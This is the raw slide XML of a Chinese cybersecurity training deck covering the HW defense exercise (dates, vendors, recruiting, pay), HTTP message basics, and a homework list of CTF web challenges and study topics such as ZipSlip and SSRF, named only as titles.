            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>民航：国航、东方、南航、海南航空</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>互联网企业、高校、医院</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>等数百家单位</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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99820" y="1270635"/>
            <a:ext cx="9869805" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网行动每年举办一次。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年是第一次，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年是第九次。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般是开始前几天才能确定时间。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日（持续</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个月）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日（持续两周）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日（持续两周）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>月</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>日（持续两周）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年起，护网开始呈常态化趋势，持续时间约</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个月。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329055" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>护网行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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86180" y="970280"/>
            <a:ext cx="9312910" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>作为蓝队参加护网的公司众多，各种分公司、子系统也特别多，所以每年护网期间都会临时招募大量的安全人员参与护网行动，做检测、研判、处置等等岗位。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>参与单位（甲方）并不直接招聘，一般是由安全服务的中标单位（各大安全公司）委托给中介招聘。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网常见安全公司：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>奇安信、深信服、安恒、天融信、安恒、启明星辰、微步、青藤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网常见中介：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>深蓝、准达、鼎夏、中睿、网创、墨安、鸿鹄、国誉、宁云志、磐石等等</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>护网持续时间比较短，工资是按日薪计算的（一般是护网结束以后几个月内结算）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1329055" y="509905"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>护网行动</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7423150" y="1372235"/>
            <a:ext cx="4171950" cy="4832350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481965" y="5116195"/>
            <a:ext cx="6614160" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、参与护网行动，将所学技能运用在实战中，提升实战技能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、丰富简历项目经验，对于将来找工作有非常大的加持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、短期内获得一笔非常不错的报酬</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、扩充自己的人脉圈子，获得更多资源</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48410" y="541020"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>课后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>作业</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013460" y="1530350"/>
            <a:ext cx="10178415" cy="3660140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>题目：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-file_include</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>题目名称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件包含</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-supersqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-easyupload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自学：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目录穿越</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ZipSlip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>死亡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是什么，怎么绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093470" y="5410200"/>
            <a:ext cx="9065260" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>题目有问题先自己看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，还是不懂就在群里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讨论</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41425" y="534670"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>下期预告（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>暂定）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1205230" y="1456055"/>
            <a:ext cx="5824855" cy="1928495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>trick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化入门（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看情况）</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Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s2Sys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49045" y="485140"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>消息结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249045" y="1171575"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求报文（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1356360" y="1666240"/>
            <a:ext cx="8573135" cy="4987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9535" y="714375"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>报文</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="604520" y="1541780"/>
            <a:ext cx="11153775" cy="46520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266825" y="466725"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>响应状态码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3424555" y="3378835"/>
            <a:ext cx="4298950" cy="597535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="3496310"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
